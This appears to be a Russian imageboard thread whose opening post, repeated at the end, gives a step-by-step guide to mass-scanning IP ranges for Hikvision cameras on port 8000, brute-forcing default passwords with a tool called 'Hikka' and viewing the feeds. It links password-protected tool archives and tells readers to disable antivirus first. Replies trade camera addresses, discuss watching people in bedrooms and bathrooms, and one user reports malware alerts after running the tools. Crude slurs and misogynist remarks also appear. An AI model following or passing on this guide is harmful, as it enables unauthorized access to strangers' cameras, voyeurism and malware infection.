0) Перед началом нужно выключить антивирус, он детектит "vnc scanner gui" и "hikka" как хакерские программы для взлома.
1) Скачиваем все необходимые программы.
2) Устанавливаем "iVMS-4200".
3) Создаем отдельную папку для "vnc_scanner_gui" закидываем его туда и запускаем.
4) Берём диапазоны IP с сайта и вставляем в большое окно программы. (Больше IP - Лучше)
5) Вписываем Port 8000 в двух местах, внизу окошка с IP и вверху справа от окошка IP и выбираем страну поиска.
6) Нажимаем на кнопку "Start scan".
7) Когда программа завершит поиск рабочих камер, нажимаете на кнопку "Start parser" и закрываете программу. (Время поиска зависит от каличества)
8) Копируете IP из "IPs.txt" и вставляете в файл "hosts" который находится в папке "Hikka". ("Host" открывается блокнотом)
9) В папке "Hikka" будет "Start.bat", запускаете его и у вас открывается консоль.
10) Дальше программа сама проверит IP адреса на стандартные пароли.
11) Результат вашего труда вы увидите в папке "pics". (В названии картинок указаны данные для подключения)
12) Запускаем программу iVMS-4200 и вводим любые данные для входа в программу, заходим в "Управление" - "Добавить устройство" и вводим данные для подключения.
Постим здесь айпишники РАБОЧИХ КАМЕР, ЖЕЛАТЕЛЬНО С ПОДДЕРЖКОЙ ДВУХСТОРОННЕГО АУДИО, полезный контент по сабжу, проигрываем с вебемок, вводим в курс дела ньюфагов.
>>169906649 (OP) А вот как себя обезопасить от такой хуйни? Скажем, сниму я номер в отеле, захочу подрочить, а там камера? Параноит теперь. Может есть какие-то способы поиска камер?
>>169907530 Во-первых, об ip-камераз мало кто знает. А если знают, то не признаются, чтобы не спугнуть клиента. Может есть типа какие-то приложения для телефонов, которые сканируют на наличие камер? Пиздец же, если эти камеры везде, то это же дичь какая-то.
>>169907729 >Может есть типа какие-то приложения для телефонов, которые сканируют на наличие камер? Выключаешь свет и смотришь камерой телефона везде. Подсветка камеры будет пиздецки сильно видна. Если камера без ИК-диодов, то соснулей, но и в темноте она нихуя не увидит. Ещё в дешёвых камерах БП подсветки громко щёлкает при включении.
Боже, как же отвратительна человеческая раса. Дикие животные смотрятся намного благороднее, кроме обезьян. Теперь понятно, почему обезьяны такой смех вызывают - те же люди.
>>169909216 >>169909264 >>169909308 Можно подумать, что вы не нюхаете свою руку после того, как яйца почешете или жопу. Можно еще в ладошку нафунять и сразу к носу. Самый кайф.
Сканировал в прошлые треды свою область где-то 8 часов, в итоге нашлось 40 камер всего, и они все висят либо на улице, либо в магазинах. Кароче я дропнул это дело, а ОП-хуй просто старые вебмы выкладывает, в надежде что кто-то доставит ему еще контента?
>>169907725 Вся суть шкур после свадьбы. Правильный поступок будет таким: ГОВОРИТ, ЧТО НЕ ВОЗБУЖДЕНА @ ЗВОНИШЬ В ПОЛИЦИЮ, ВЕДЬ У ТЕБЯ ДОМА ПОСТОРОННЯЯ ШКУРА, ВЫГОНЯЕШЬ ЕЕ ИЗ ДОМА
>>169909587 лол А вообще, чё за хуйня анон, откуда столько камер? Это типо скрытые камеры в той хуйне по пожарной безопасности встроенные? Или это прямо такая хуйня на потолке как в супермаркетах висит?
Нахуя людям камеры в спяльнях и ванной комнате? Это все съемные квартиры, я так понимаю? Видео что ли интернетами владельцу камеры отправляется? Это законно вообще?
Сука, ебучие свинопидоршки. Покупают говномебель, но при этом ВСЁ РАВНО устилают ее леапёрдовыми покрывалами, чтобы МАЛО ЛИ ЧТО НЕ ПОВРЕДИЛИ И НЕ ИСПАЧКАЛИ, как будто это говно стоит не 20-40к, а 500к рублей и настоящей кожи.
>>169931711 > чтобы МАЛО ЛИ ЧТО НЕ ПОВРЕДИЛИ И НЕ ИСПАЧКАЛИ Может леопардовое покрывало так себе выбор, однако в целом чехлы очень удобны - снял - отдал в химчистку - диван чистый
>>169932992 У меня ЗАЩИТНИК ШИНДОВС сработал. После "фикса" и перезагрузки я еще CureIt прошёлся по всему диску. В автозагрузке и планировщике заданий вроде ничего нет
>>169933548 Хуюб, блджад. Я прошёлся CureIt, проверил автозагрузку, запущенные процессы и планировщик задач Ты по существу ответить можешь где и как это ещё может остаться в системе?
>>169948007 через 4it диапазон, через kport сканил, все это заливаю скриптом на адреса, аж обои от стен отклеиваются, но камер нет активных, вот думаю может что с клиентом IVMS ,по этому реквестирую адрес IP рабочий
Нетсталкер из Хиддена в треде, давай я вам камер покидаю. (И да, вас наебенили, у меня VNC скачан с другого места и антивирус к нему спокойно относится)
ИНСТРУКЦИЯ:
0) Перед началом нужно выключить антивирус, он детектит "vnc scanner gui" и "hikka" как хакерские программы для взлома.
1) Скачиваем все необходимые программы.
2) Устанавливаем "iVMS-4200".
3) Создаем отдельную папку для "vnc_scanner_gui" закидываем его туда и запускаем.
4) Берём диапазоны IP с сайта и вставляем в большое окно программы. (Больше IP - Лучше)
5) Вписываем Port 8000 в двух местах, внизу окошка с IP и вверху справа от окошка IP и выбираем страну поиска.
6) Нажимаем на кнопку "Start scan".
7) Когда программа завершит поиск рабочих камер, нажимаете на кнопку "Start parser" и закрываете программу. (Время поиска зависит от каличества)
8) Копируете IP из "IPs.txt" и вставляете в файл "hosts" который находится в папке "Hikka". ("Host" открывается блокнотом)
9) В папке "Hikka" будет "Start.bat", запускаете его и у вас открывается консоль.
10) Дальше программа сама проверит IP адреса на стандартные пароли.
11) Результат вашего труда вы увидите в папке "pics". (В названии картинок указаны данные для подключения)
12) Запускаем программу iVMS-4200 и вводим любые данные для входа в программу, заходим в "Управление" - "Добавить устройство" и вводим данные для подключения.
Более подробная инструкция в картинках от Пикабу-дебилов: - http://pikabu.ru/story/_3294899
Скачиваем iVMS-4200 - http://www.hikvision.ru/product/ivms_4200
Скачиваем VNC сканер - http://rgho.st/6nylLrhtx
Скачиваем Hikka - http://rgho.st/7NWkSp2w9
Пароль от архивов стандартный - 2ch
Сайт с диапазонами городов - http://0s.gruxiltnmu.cmle.ru/getlistip
Постим здесь айпишники РАБОЧИХ КАМЕР, ЖЕЛАТЕЛЬНО С ПОДДЕРЖКОЙ ДВУХСТОРОННЕГО АУДИО, полезный контент по сабжу, проигрываем с вебемок, вводим в курс дела ньюфагов.